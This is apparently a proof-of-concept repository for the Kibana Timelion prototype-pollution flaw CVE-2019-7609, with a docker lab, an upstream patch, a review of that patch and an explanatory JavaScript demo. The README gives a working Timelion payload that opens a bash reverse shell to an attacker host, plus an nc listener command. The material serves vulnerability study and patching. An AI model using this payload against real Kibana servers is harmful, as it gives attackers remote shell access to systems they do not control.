├── README.md
├── docker-compose.yml
└── img
    ├── kibana-payload.png
    └── reverse-shell.png

/README.md:
--------------------------------------------------------------------------------
# CVE-2019-7609 (Kibana)

Remote code execution through a flaw in Kibana's Timelion visualizer. The `.props()` series function unflattens user-supplied key paths without guarding against a `__proto__` segment, so an attacker can add properties to `Object.prototype`. A Node.js child process that Kibana later spawns inherits the polluted `env` object as its environment, and `NODE_OPTIONS=--require /proc/self/environ` makes Node execute the attacker-controlled environment variable as JavaScript.

## Environment setup (docker)

1. Bring up the attached docker-compose.yml.
```
docker-compose up -d
```
2. Open `http://127.0.0.1:5601` in a browser.

## Exploit

1. Start a listener for the reverse shell.
```
$ nc -lvp 6666
```
2. On Kibana's Timelion page, enter the payload and click run. Replace `<attacker-ip>` with an address the Kibana container can reach; `127.0.0.1` inside the container is the container itself, not the host running `nc`.

```
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/<attacker-ip>/6666 0>&1");process.exit()//').props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
```

3. Click Canvas in the left panel.
4. The Kibana server connects back to the listener with a reverse shell :)

![payload](img/kibana-payload.png)
![reverse-shell](img/reverse-shell.png)

## Patch

Update Kibana to 6.6.1 or 5.6.15 or later.

### Fixed source code

https://github.com/elastic/kibana/commit/3377f813a5d96ff466bdf7343ce161de24830ed4.patch

```patch
From 3377f813a5d96ff466bdf7343ce161de24830ed4 Mon Sep 17 00:00:00 2001
From: ppisljar
Date: Wed, 16 Jan 2019 06:01:20 -0800
Subject: [PATCH] fixes

---
 .../core_plugins/timelion/server/series_functions/props.js | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/legacy/core_plugins/timelion/server/series_functions/props.js b/src/legacy/core_plugins/timelion/server/series_functions/props.js
index 81b74901d4db..80e9cafd6712 100644
--- a/src/legacy/core_plugins/timelion/server/series_functions/props.js
+++ b/src/legacy/core_plugins/timelion/server/series_functions/props.js
@@ -32,7 +32,7 @@ function unflatten(data) {
     let prop = '';
     let m;
     while (m = regex.exec(p)) {
-      cur = cur[prop] || (cur[prop] = (m[2] ? [] : {}));
+      cur = (cur.hasOwnProperty(prop) && cur[prop]) || (cur[prop] = (m[2] ? [] : {}));
       prop = m[2] || m[1];
     }
     cur[prop] = data[p];
```

--------------------------------------------------------------------------------
/docker-compose.yml:
--------------------------------------------------------------------------------
version: '3.7'

services:
  elasticsearch:
    image: docker.elastic.co/elasticsearch/elasticsearch:6.6.0
    container_name: elasticsearch
    environment:
      - discovery.type=single-node

  kibana:
    # 6.5.4 predates the fixed 6.6.1 release, so Timelion is still vulnerable
    image: docker.elastic.co/kibana/kibana:6.5.4
    container_name: kibana
    ports:
      - "5601:5601"
    depends_on:
      - elasticsearch
--------------------------------------------------------------------------------
/img/kibana-payload.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hekadan/CVE-2019-7609/0a2d8c00ec4ec185790cc8e6a519db71f8e1ef7b/img/kibana-payload.png
--------------------------------------------------------------------------------
/img/reverse-shell.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hekadan/CVE-2019-7609/0a2d8c00ec4ec185790cc8e6a519db71f8e1ef7b/img/reverse-shell.png
--------------------------------------------------------------------------------
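Review bot: the `cur.hasOwnProperty(prop)` call added in the `+` line of the props.js hunk can be broken by the same untrusted key paths it is meant to filter. A path segment named `hasOwnProperty` is stored as an own property by the unchanged `cur[prop] = data[p]` write, and a later key path that descends through that object then hits `cur.hasOwnProperty` as a non-function and throws. Call it through the prototype instead, `Object.prototype.hasOwnProperty.call(cur, prop)`, and consider rejecting the `__proto__`, `constructor` and `prototype` segments outright rather than relying on the own-property check alone: the unchanged final write `cur[prop] = data[p]` still lets a trailing `__proto__` segment change the prototype of the object being built when the value is an object. A regression test using the `label.__proto__.env.X` key shape would pin the fix down, and the commit message "fixes" says nothing about what was fixed.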
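The mechanism behind the payload and the patch, as an added example that is not part of this repository or of Kibana's code: the two `unflatten` variants follow the shape of the hunk above (the `regex` and the final `return` are assumptions about lines the patch does not show), and `envSeenBySpawn` is a constructed stand-in for the way `child_process.spawn` reads `options.env` through the prototype chain when the caller passes no `env`. The payload object is constructed with the same key shape as the Timelion expression; the command is `id` rather than the reverse shell.

```javascript
// Added example (not Kibana's code): vulnerable vs. patched key-path unflattening
// from Timelion's props.js, and why the pollution reaches a spawned process.

// Pre-patch behaviour: `cur[prop]` resolves inherited properties, so the segment
// "__proto__" walks into Object.prototype and the write below pollutes it.
function unflattenVulnerable(data) {
  // Assumed from the unshown part of props.js: splits "a.b[0].c" into segments.
  const regex = /\.?([^.\[\]]+)|\[(\d+)\]/g;
  const result = {};
  for (const p in data) {
    let cur = result;
    let prop = '';
    let m;
    while ((m = regex.exec(p))) {
      cur = cur[prop] || (cur[prop] = (m[2] ? [] : {}));
      prop = m[2] || m[1];
    }
    cur[prop] = data[p];
  }
  return result[''] || result; // assumed return shape
}

// Post-patch behaviour: only own properties are descended into, so "__proto__"
// is assigned a fresh object (changing only this object's prototype) instead of
// resolving to the shared Object.prototype.
function unflattenPatched(data) {
  const regex = /\.?([^.\[\]]+)|\[(\d+)\]/g;
  const result = {};
  for (const p in data) {
    let cur = result;
    let prop = '';
    let m;
    while ((m = regex.exec(p))) {
      cur = (cur.hasOwnProperty(prop) && cur[prop]) || (cur[prop] = (m[2] ? [] : {}));
      prop = m[2] || m[1];
    }
    cur[prop] = data[p];
  }
  return result[''] || result;
}

// Constructed stand-in for the relevant part of child_process.spawn: with no
// explicit `env`, the lookup `options.env` falls through to the prototype chain.
function envSeenBySpawn(options) {
  return options.env === undefined ? null : { ...options.env };
}

// Constructed payload, same key shape as the Timelion expression in the README.
const PAYLOAD = {
  'label.__proto__.env.AAAA': 'require("child_process").exec("id");process.exit()//',
  'label.__proto__.env.NODE_OPTIONS': '--require /proc/self/environ',
};

// Runs one unflatten variant on the payload, then asks what a completely
// unrelated, empty options object would hand to spawn. Cleans up afterwards so
// the pollution does not leak into the rest of this process.
function pollutionDemo(unflatten) {
  try {
    unflatten(PAYLOAD);
    return envSeenBySpawn({});
  } finally {
    delete Object.prototype.env;
  }
}

console.log('vulnerable unflatten, env seen by spawn:', pollutionDemo(unflattenVulnerable));
console.log('patched unflatten,    env seen by spawn:', pollutionDemo(unflattenPatched));
```

With the vulnerable variant the empty options object reports an `env` containing both `AAAA` and `NODE_OPTIONS`, which is exactly what the child process started by Canvas receives; with the patched variant it reports none, because the `__proto__` segment now only re-parents the `label` object being built.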